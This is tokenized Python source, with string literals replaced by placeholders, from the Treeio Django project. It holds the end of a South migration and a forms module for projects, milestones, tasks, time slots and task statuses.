'<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : [ '<STR_LIT>' ] } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:body>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> 
'<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:title>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : [ '<STR_LIT>' ] } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : 
'<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : [ '<STR_LIT>' ] } , <EOL> '<STR_LIT:body>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } <EOL> } <EOL> complete_apps = [ '<STR_LIT>' ] </s>
<s> """<STR_LIT>""" <EOL> from django . forms import ModelForm , CharField , TextInput , Form , ModelChoiceField , IntegerField , ChoiceField <EOL> from treeio . projects . models import Project , Milestone , Task , TaskTimeSlot , TaskStatus <EOL> from treeio . core . models import Object , ModuleSetting , UpdateRecord <EOL> from treeio . identities . models import Contact <EOL> from datetime import timedelta , datetime <EOL> from django . core . urlresolvers import reverse <EOL> from django . utils . translation import ugettext as _ <EOL> from treeio . core . decorators import preprocess_form <EOL> preprocess_form ( ) <EOL> class SettingsForm ( Form ) : <EOL> """<STR_LIT>""" <EOL> default_task_status = ModelChoiceField ( <EOL> label = '<STR_LIT>' , queryset = [ ] ) <EOL> def __init__ ( self , user , * args , ** kwargs ) : <EOL> "<STR_LIT>" <EOL> super ( SettingsForm , self ) . __init__ ( * args , ** kwargs ) <EOL> self . fields [ '<STR_LIT>' ] . queryset = Object . filter_permitted ( user , <EOL> TaskStatus . objects , mode = '<STR_LIT:x>' ) <EOL> try : <EOL> conf = ModuleSetting . get_for_module ( <EOL> '<STR_LIT>' , '<STR_LIT>' ) [ <NUM_LIT:0> ] <EOL> default_task_status = TaskStatus . objects . get ( pk = long ( conf . value ) ) <EOL> self . fields [ '<STR_LIT>' ] . initial = default_task_status . id <EOL> except Exception : <EOL> pass <EOL> def save ( self ) : <EOL> "<STR_LIT>" <EOL> try : <EOL> ModuleSetting . set_for_module ( '<STR_LIT>' , <EOL> self . cleaned_data [ <EOL> '<STR_LIT>' ] . 
id , <EOL> '<STR_LIT>' ) <EOL> except Exception : <EOL> return False <EOL> class MassActionForm ( Form ) : <EOL> """<STR_LIT>""" <EOL> status = ModelChoiceField ( queryset = [ ] , required = False ) <EOL> project = ModelChoiceField ( queryset = [ ] , required = False ) <EOL> milestone = ModelChoiceField ( queryset = [ ] , required = False ) <EOL> delete = ChoiceField ( label = _ ( "<STR_LIT>" ) , choices = ( ( '<STR_LIT>' , '<STR_LIT>' ) , ( '<STR_LIT>' , _ ( '<STR_LIT>' ) ) , <EOL> ( '<STR_LIT>' , _ ( '<STR_LIT>' ) ) ) , required = False ) <EOL> instance = None <EOL> def __init__ ( self , user , * args , ** kwargs ) : <EOL> if '<STR_LIT>' in kwargs : <EOL> self . instance = kwargs [ '<STR_LIT>' ] <EOL> del kwargs [ '<STR_LIT>' ] <EOL> super ( MassActionForm , self ) . __init__ ( * args , ** kwargs ) <EOL> self . fields [ '<STR_LIT:status>' ] . queryset = Object . filter_permitted ( <EOL> user , TaskStatus . objects , mode = '<STR_LIT:x>' ) <EOL> self . fields [ '<STR_LIT:status>' ] . label = _ ( "<STR_LIT>" ) <EOL> self . fields [ '<STR_LIT>' ] . queryset = Object . filter_permitted ( <EOL> user , Project . objects , mode = '<STR_LIT:x>' ) <EOL> self . fields [ '<STR_LIT>' ] . label = _ ( "<STR_LIT>" ) <EOL> self . fields [ '<STR_LIT>' ] . queryset = Object . filter_permitted ( <EOL> user , Milestone . objects , mode = '<STR_LIT:x>' ) <EOL> self . fields [ '<STR_LIT>' ] . label = _ ( "<STR_LIT>" ) <EOL> self . fields [ '<STR_LIT>' ] = ChoiceField ( label = _ ( "<STR_LIT>" ) , choices = ( ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , _ ( <EOL> '<STR_LIT>' ) ) , <EOL> ( '<STR_LIT>' , _ ( '<STR_LIT>' ) ) ) , required = False ) <EOL> def save ( self , * args , ** kwargs ) : <EOL> "<STR_LIT>" <EOL> if self . instance : <EOL> if self . is_valid ( ) : <EOL> if self . cleaned_data [ '<STR_LIT>' ] : <EOL> self . instance . project = self . cleaned_data [ '<STR_LIT>' ] <EOL> if self . cleaned_data [ '<STR_LIT:status>' ] : <EOL> self . instance . status = self . 
cleaned_data [ '<STR_LIT:status>' ] <EOL> if self . cleaned_data [ '<STR_LIT>' ] : <EOL> self . instance . milestone = self . cleaned_data [ '<STR_LIT>' ] <EOL> self . instance . save ( ) <EOL> if self . cleaned_data [ '<STR_LIT>' ] : <EOL> if self . cleaned_data [ '<STR_LIT>' ] == '<STR_LIT>' : <EOL> self . instance . delete ( ) <EOL> if self . cleaned_data [ '<STR_LIT>' ] == '<STR_LIT>' : <EOL> self . instance . trash = True <EOL> self . instance . save ( ) <EOL> class ProjectForm ( ModelForm ) : <EOL> """<STR_LIT>""" <EOL> name = CharField ( widget = TextInput ( attrs = { '<STR_LIT:size>' : '<STR_LIT>' } ) ) <EOL> def __init__ ( self , user , project_id , * args , ** kwargs ) : <EOL> super ( ProjectForm , self ) . __init__ ( * args , ** kwargs ) <EOL> self . fields [ '<STR_LIT:name>' ] . label = _ ( "<STR_LIT:Name>" ) <EOL> self . fields [ '<STR_LIT>' ] . queryset = Object . filter_permitted ( <EOL> user , Project . objects , mode = '<STR_LIT:x>' ) <EOL> self . fields [ '<STR_LIT>' ] . label = _ ( "<STR_LIT>" ) <EOL> if project_id : <EOL> self . fields [ '<STR_LIT>' ] . initial = project_id <EOL> self . fields [ '<STR_LIT>' ] . queryset = Object . filter_permitted ( <EOL> user , Contact . objects , mode = '<STR_LIT:x>' ) <EOL> self . fields [ '<STR_LIT>' ] . label = _ ( "<STR_LIT>" ) <EOL> self . fields [ '<STR_LIT>' ] . widget . attrs . update ( { '<STR_LIT:class>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : reverse ( '<STR_LIT>' ) } ) <EOL> self . fields [ '<STR_LIT>' ] . widget . attrs . update ( <EOL> { '<STR_LIT>' : reverse ( '<STR_LIT>' ) } ) <EOL> self . fields [ '<STR_LIT>' ] . label = _ ( "<STR_LIT>" ) <EOL> self . fields [ '<STR_LIT>' ] . queryset = Object . filter_permitted ( <EOL> user , Contact . objects , mode = '<STR_LIT:x>' ) <EOL> self . fields [ '<STR_LIT>' ] . widget . attrs . update ( { '<STR_LIT:class>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : reverse ( '<STR_LIT>' ) } ) <EOL> self . fields [ '<STR_LIT>' ] . widget . attrs . 
update ( <EOL> { '<STR_LIT>' : reverse ( '<STR_LIT>' ) } ) <EOL> self . fields [ '<STR_LIT>' ] . label = _ ( "<STR_LIT>" ) <EOL> self . fields [ '<STR_LIT>' ] . widget . attrs . update ( { '<STR_LIT:class>' : '<STR_LIT>' } ) <EOL> class Meta : <EOL> """<STR_LIT>""" <EOL> model = Project <EOL> fields = ( '<STR_LIT:name>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> class MilestoneForm ( ModelForm ) : <EOL> """<STR_LIT>""" <EOL> name = CharField ( widget = TextInput ( attrs = { '<STR_LIT:size>' : '<STR_LIT>' } ) ) <EOL> def __init__ ( self , user , project_id , * args , ** kwargs ) : <EOL> super ( MilestoneForm , self ) . __init__ ( * args , ** kwargs ) <EOL> self . fields [ '<STR_LIT:name>' ] . label = _ ( "<STR_LIT:Name>" ) <EOL> self . fields [ '<STR_LIT>' ] . label = _ ( "<STR_LIT>" ) <EOL> self . fields [ '<STR_LIT>' ] . queryset = Object . filter_permitted ( <EOL> user , Project . objects , mode = '<STR_LIT:x>' ) <EOL> if project_id : <EOL> self . fields [ '<STR_LIT>' ] . initial = project_id <EOL> self . fields [ '<STR_LIT:status>' ] . label = _ ( "<STR_LIT>" ) <EOL> self . fields [ '<STR_LIT:status>' ] . queryset = Object . filter_permitted ( <EOL> user , TaskStatus . objects , mode = '<STR_LIT:x>' ) <EOL> try : <EOL> conf = ModuleSetting . get_for_module ( <EOL> '<STR_LIT>' , '<STR_LIT>' ) [ <NUM_LIT:0> ] <EOL> self . fields [ '<STR_LIT:status>' ] . initial = long ( conf . value ) <EOL> except Exception : <EOL> pass <EOL> self . fields [ '<STR_LIT>' ] . label = _ ( "<STR_LIT>" ) <EOL> self . fields [ '<STR_LIT>' ] . widget . attrs . update ( <EOL> { '<STR_LIT:class>' : '<STR_LIT>' } ) <EOL> self . fields [ '<STR_LIT>' ] . label = _ ( "<STR_LIT>" ) <EOL> self . fields [ '<STR_LIT>' ] . widget . attrs . update ( <EOL> { '<STR_LIT:class>' : '<STR_LIT>' } ) <EOL> if '<STR_LIT>' in kwargs : <EOL> instance = kwargs [ '<STR_LIT>' ] <EOL> if instance . start_date : <EOL> self . fields [ '<STR_LIT>' ] . widget . attrs . 
update ( <EOL> { '<STR_LIT>' : instance . start_date . strftime ( '<STR_LIT:%s>' ) } ) <EOL> if instance . end_date : <EOL> self . fields [ '<STR_LIT>' ] . widget . attrs . update ( <EOL> { '<STR_LIT>' : instance . end_date . strftime ( '<STR_LIT:%s>' ) } ) <EOL> self . fields [ '<STR_LIT>' ] . label = _ ( "<STR_LIT>" ) <EOL> self . fields [ '<STR_LIT>' ] . widget . attrs . update ( { '<STR_LIT:class>' : '<STR_LIT>' } ) <EOL> class Meta : <EOL> "<STR_LIT>" <EOL> model = Milestone <EOL> fields = ( <EOL> '<STR_LIT:name>' , '<STR_LIT>' , '<STR_LIT:status>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> class TaskForm ( ModelForm ) : <EOL> """<STR_LIT>""" <EOL> name = CharField ( widget = TextInput ( attrs = { '<STR_LIT:size>' : '<STR_LIT>' } ) ) <EOL> def __init__ ( self , user , parent , project_id , milestone_id , * args , ** kwargs ) : <EOL> "<STR_LIT>" <EOL> super ( TaskForm , self ) . __init__ ( * args , ** kwargs ) <EOL> self . fields [ '<STR_LIT:name>' ] . label = _ ( "<STR_LIT:Name>" ) <EOL> self . fields [ '<STR_LIT:name>' ] . widget . attrs . update ( { '<STR_LIT:class>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : reverse ( '<STR_LIT>' ) } ) <EOL> self . fields [ '<STR_LIT:status>' ] . label = _ ( "<STR_LIT>" ) <EOL> self . fields [ '<STR_LIT:status>' ] . queryset = Object . filter_permitted ( <EOL> user , TaskStatus . objects , mode = '<STR_LIT:x>' ) <EOL> try : <EOL> conf = ModuleSetting . get_for_module ( <EOL> '<STR_LIT>' , '<STR_LIT>' ) [ <NUM_LIT:0> ] <EOL> self . fields [ '<STR_LIT:status>' ] . initial = long ( conf . value ) <EOL> except Exception : <EOL> pass <EOL> self . user = user <EOL> self . fields [ '<STR_LIT>' ] . label = _ ( "<STR_LIT>" ) <EOL> self . fields [ '<STR_LIT>' ] . help_text = "<STR_LIT>" <EOL> self . fields [ '<STR_LIT>' ] . widget . attrs . update ( { '<STR_LIT:class>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : reverse ( '<STR_LIT>' ) } ) <EOL> self . fields [ '<STR_LIT>' ] . label = _ ( "<STR_LIT>" ) <EOL> self . fields [ '<STR_LIT>' ] . 
queryset = Object . filter_permitted ( <EOL> user , Contact . objects , mode = '<STR_LIT:x>' ) <EOL> if not self . instance . id : <EOL> contact = user . get_contact ( ) <EOL> if contact : <EOL> self . fields [ '<STR_LIT>' ] . initial = contact . id <EOL> self . instance . caller = contact <EOL> self . fields [ '<STR_LIT>' ] . widget . attrs . update ( { '<STR_LIT:class>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : reverse ( '<STR_LIT>' ) } ) <EOL> self . fields [ '<STR_LIT>' ] . widget . attrs . update ( <EOL> { '<STR_LIT>' : reverse ( '<STR_LIT>' ) } ) <EOL> self . fields [ '<STR_LIT>' ] . label = _ ( "<STR_LIT>" ) <EOL> self . fields [ '<STR_LIT>' ] . queryset = Object . filter_permitted ( <EOL> user , Project . objects , mode = '<STR_LIT:x>' ) <EOL> if project_id : <EOL> self . fields [ '<STR_LIT>' ] . initial = project_id <EOL> self . fields [ '<STR_LIT>' ] . label = _ ( "<STR_LIT>" ) <EOL> self . fields [ '<STR_LIT>' ] . queryset = Object . filter_permitted ( <EOL> user , Milestone . objects , mode = '<STR_LIT:x>' ) <EOL> if milestone_id : <EOL> self . fields [ '<STR_LIT>' ] . initial = milestone_id <EOL> self . fields [ '<STR_LIT>' ] . label = _ ( "<STR_LIT>" ) <EOL> self . fields [ '<STR_LIT>' ] . widget . attrs . update ( { '<STR_LIT:class>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : reverse ( '<STR_LIT>' ) } ) <EOL> self . fields [ '<STR_LIT>' ] . label = _ ( "<STR_LIT>" ) <EOL> self . fields [ '<STR_LIT>' ] . widget . attrs . update ( { '<STR_LIT:class>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : reverse ( '<STR_LIT>' ) } ) <EOL> self . fields [ '<STR_LIT>' ] . queryset = Object . filter_permitted ( <EOL> user , Milestone . objects , mode = '<STR_LIT:x>' ) <EOL> self . fields [ '<STR_LIT>' ] . queryset = Object . filter_permitted ( <EOL> user , Task . objects , mode = '<STR_LIT:x>' ) <EOL> self . fields [ '<STR_LIT>' ] . label = _ ( "<STR_LIT>" ) <EOL> self . fields [ '<STR_LIT>' ] . initial = <NUM_LIT:3> <EOL> self . fields [ '<STR_LIT>' ] . 
choices = ( ( <NUM_LIT:5> , _ ( '<STR_LIT>' ) ) , ( <EOL> <NUM_LIT:4> , _ ( '<STR_LIT>' ) ) , ( <NUM_LIT:3> , _ ( '<STR_LIT>' ) ) , ( <NUM_LIT:2> , _ ( '<STR_LIT>' ) ) , ( <NUM_LIT:1> , _ ( '<STR_LIT>' ) ) ) <EOL> self . fields [ '<STR_LIT>' ] . queryset = Object . filter_permitted ( <EOL> user , Task . objects , mode = '<STR_LIT:x>' ) <EOL> if parent : <EOL> self . fields [ '<STR_LIT>' ] . initial = parent . id <EOL> self . fields [ '<STR_LIT>' ] . initial = parent . project_id <EOL> if parent . milestone_id : <EOL> self . fields [ '<STR_LIT>' ] . initial = parent . milestone_id <EOL> self . fields [ '<STR_LIT>' ] . label = _ ( "<STR_LIT>" ) <EOL> self . fields [ '<STR_LIT>' ] . widget . attrs . update ( <EOL> { '<STR_LIT:class>' : '<STR_LIT>' } ) <EOL> self . fields [ '<STR_LIT>' ] . label = _ ( "<STR_LIT>" ) <EOL> self . fields [ '<STR_LIT>' ] . widget . attrs . update ( <EOL> { '<STR_LIT:class>' : '<STR_LIT>' } ) <EOL> if '<STR_LIT>' in kwargs : <EOL> instance = kwargs [ '<STR_LIT>' ] <EOL> if instance . start_date : <EOL> self . fields [ '<STR_LIT>' ] . widget . attrs . update ( <EOL> { '<STR_LIT>' : instance . start_date . strftime ( '<STR_LIT:%s>' ) } ) <EOL> if instance . end_date : <EOL> self . fields [ '<STR_LIT>' ] . widget . attrs . update ( <EOL> { '<STR_LIT>' : instance . end_date . strftime ( '<STR_LIT:%s>' ) } ) <EOL> self . fields [ '<STR_LIT>' ] . label = _ ( "<STR_LIT>" ) <EOL> self . fields [ '<STR_LIT>' ] . widget . attrs . update ( { '<STR_LIT:class>' : '<STR_LIT>' } ) <EOL> self . fields [ '<STR_LIT>' ] . label = _ ( "<STR_LIT>" ) <EOL> self . fields [ '<STR_LIT>' ] . help_text = _ ( "<STR_LIT>" ) <EOL> def old_save ( self , * args , ** kwargs ) : <EOL> "<STR_LIT>" <EOL> original = None <EOL> original_assigned = [ ] <EOL> if hasattr ( self , '<STR_LIT>' ) : <EOL> try : <EOL> original = Task . objects . get ( pk = self . instance . id ) <EOL> original_assigned = list ( original . assigned . all ( ) ) <EOL> except Task . 
DoesNotExist : <EOL> pass <EOL> instance = super ( TaskForm , self ) . save ( * args , ** kwargs ) <EOL> if original : <EOL> new_assigned = list ( self . cleaned_data [ '<STR_LIT>' ] ) <EOL> if original_assigned != new_assigned : <EOL> for assignee in new_assigned : <EOL> self . instance . subscribers . add ( assignee ) <EOL> return instance <EOL> class Meta : <EOL> "<STR_LIT>" <EOL> model = Task <EOL> fields = ( '<STR_LIT:name>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT:status>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> class TaskTimeSlotForm ( ModelForm ) : <EOL> """<STR_LIT>""" <EOL> minutes = IntegerField ( widget = TextInput ( attrs = { '<STR_LIT:size>' : '<STR_LIT:5>' } ) ) <EOL> def __init__ ( self , user , task_id , * args , ** kwargs ) : <EOL> super ( TaskTimeSlotForm , self ) . __init__ ( * args , ** kwargs ) <EOL> self . fields [ '<STR_LIT>' ] . label = _ ( "<STR_LIT>" ) <EOL> self . fields [ '<STR_LIT>' ] . label = _ ( "<STR_LIT>" ) <EOL> self . fields [ '<STR_LIT>' ] . widget . attrs . update ( <EOL> { '<STR_LIT:class>' : '<STR_LIT>' } ) <EOL> self . fields [ '<STR_LIT>' ] . widget . attrs . update ( { '<STR_LIT:class>' : '<STR_LIT>' } ) <EOL> if '<STR_LIT>' in kwargs : <EOL> instance = kwargs [ '<STR_LIT>' ] <EOL> if instance . time_from : <EOL> self . fields [ '<STR_LIT>' ] . widget . attrs . update ( <EOL> { '<STR_LIT>' : ( instance . time_from - datetime ( <NUM_LIT> , <NUM_LIT:1> , <NUM_LIT:1> ) ) . total_seconds ( ) } ) <EOL> if instance . time_to : <EOL> self . fields [ '<STR_LIT>' ] . widget . attrs . update ( <EOL> { '<STR_LIT>' : ( instance . time_to - datetime ( <NUM_LIT> , <NUM_LIT:1> , <NUM_LIT:1> ) ) . total_seconds ( ) } ) <EOL> self . fields [ '<STR_LIT>' ] . label = _ ( "<STR_LIT>" ) <EOL> self . fields [ '<STR_LIT>' ] . label = _ ( "<STR_LIT>" ) <EOL> self . fields [ '<STR_LIT>' ] . widget . attrs . 
update ( { '<STR_LIT:class>' : '<STR_LIT>' } ) <EOL> if '<STR_LIT>' in kwargs : <EOL> self . instance = kwargs [ '<STR_LIT>' ] <EOL> if self . instance . id : <EOL> del self . fields [ '<STR_LIT>' ] <EOL> else : <EOL> del self . fields [ '<STR_LIT>' ] <EOL> del self . fields [ '<STR_LIT>' ] <EOL> else : <EOL> del self . fields [ '<STR_LIT>' ] <EOL> del self . fields [ '<STR_LIT>' ] <EOL> def save ( self , * args , ** kwargs ) : <EOL> "<STR_LIT>" <EOL> if hasattr ( self , '<STR_LIT>' ) and self . instance . time_to and not self . instance . time_from : <EOL> minutes = long ( self . cleaned_data [ '<STR_LIT>' ] ) <EOL> hours = <NUM_LIT:0> L <EOL> days = <NUM_LIT:0> L <EOL> if minutes >= <NUM_LIT> : <EOL> hours = minutes // <NUM_LIT> <EOL> minutes %= <NUM_LIT> <EOL> if hours >= <NUM_LIT> : <EOL> days = hours // <NUM_LIT> <EOL> hours %= <NUM_LIT> <EOL> delta = timedelta ( days = days , hours = hours , minutes = minutes ) <EOL> self . instance . time_from = self . instance . time_to - delta <EOL> return super ( TaskTimeSlotForm , self ) . save ( * args , ** kwargs ) <EOL> class Meta : <EOL> "<STR_LIT>" <EOL> model = TaskTimeSlot <EOL> fields = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> class TaskStatusForm ( ModelForm ) : <EOL> """<STR_LIT>""" <EOL> name = CharField ( widget = TextInput ( attrs = { '<STR_LIT:size>' : '<STR_LIT>' } ) ) <EOL> def __init__ ( self , user , * args , ** kwargs ) : <EOL> super ( TaskStatusForm , self ) . __init__ ( * args , ** kwargs ) <EOL> self . fields [ '<STR_LIT:name>' ] . label = _ ( "<STR_LIT:Name>" ) <EOL> self . fields [ '<STR_LIT>' ] . label = _ ( "<STR_LIT>" ) <EOL> self . fields [ '<STR_LIT>' ] . label = _ ( "<STR_LIT>" ) <EOL> self . fields [ '<STR_LIT>' ] . 
label = _ ( "<STR_LIT>" ) <EOL> class Meta : <EOL> "<STR_LIT>" <EOL> model = TaskStatus <EOL> fields = ( '<STR_LIT:name>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> class FilterForm ( ModelForm ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , user , skip = None , * args , ** kwargs ) : <EOL> if skip is None : <EOL> skip = [ ] <EOL> super ( FilterForm , self ) . __init__ ( * args , ** kwargs ) <EOL> self . fields [ '<STR_LIT>' ] . label = _ ( "<STR_LIT>" ) <EOL> if '<STR_LIT>' in skip : <EOL> del self . fields [ '<STR_LIT>' ] <EOL> else : <EOL> self . fields [ '<STR_LIT>' ] . queryset = Object . filter_permitted ( <EOL> user , Contact . objects , mode = '<STR_LIT:x>' ) <EOL> self . fields [ '<STR_LIT>' ] . required = False <EOL> self . fields [ '<STR_LIT>' ] . widget . attrs . update ( { '<STR_LIT:class>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : reverse ( '<STR_LIT>' ) } ) <EOL> self . fields [ '<STR_LIT:status>' ] . label = _ ( "<STR_LIT>" ) <EOL> if '<STR_LIT:status>' in skip : <EOL> del self . fields [ '<STR_LIT:status>' ] <EOL> else : <EOL> self . fields [ '<STR_LIT:status>' ] . queryset = Object . filter_permitted ( <EOL> user , TaskStatus . objects , mode = '<STR_LIT:x>' ) <EOL> self . fields [ '<STR_LIT:status>' ] . required = False <EOL> self . fields [ '<STR_LIT>' ] . label = _ ( "<STR_LIT>" ) <EOL> self . fields [ '<STR_LIT>' ] . widget . attrs . update ( { '<STR_LIT:class>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : reverse ( '<STR_LIT>' ) } ) <EOL> if '<STR_LIT>' in skip : <EOL> del self . fields [ '<STR_LIT>' ] <EOL> else : <EOL> self . fields [ '<STR_LIT>' ] . help_text = "<STR_LIT>" <EOL> self . fields [ '<STR_LIT>' ] . label = _ ( "<STR_LIT>" ) <EOL> if '<STR_LIT>' in skip : <EOL> del self . fields [ '<STR_LIT>' ] <EOL> else : <EOL> self . fields [ '<STR_LIT>' ] . queryset = Object . filter_permitted ( <EOL> user , Project . objects , mode = '<STR_LIT:x>' ) <EOL> self . fields [ '<STR_LIT>' ] . required = False <EOL> self . fields [ '<STR_LIT>' ] . 
label = _ ( "<STR_LIT>" ) <EOL> if '<STR_LIT>' in skip : <EOL> del self . fields [ '<STR_LIT>' ] <EOL> else : <EOL> self . fields [ '<STR_LIT>' ] . queryset = Object . filter_permitted ( <EOL> user , Milestone . objects , mode = '<STR_LIT:x>' ) <EOL> class Meta : <EOL> "<STR_LIT>" <EOL> model = Task <EOL> fields = ( '<STR_LIT>' , '<STR_LIT:status>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> class TaskRecordForm ( ModelForm ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , user , * args , ** kwargs ) : <EOL> super ( TaskRecordForm , self ) . __init__ ( * args , ** kwargs ) <EOL> self . fields [ '<STR_LIT:body>' ] . required = True <EOL> self . fields [ '<STR_LIT:body>' ] . label = _ ( "<STR_LIT>" ) <EOL> class Meta : <EOL> "<STR_LIT>" <EOL> model = UpdateRecord <EOL> fields = [ '<STR_LIT:body>' ] </s>
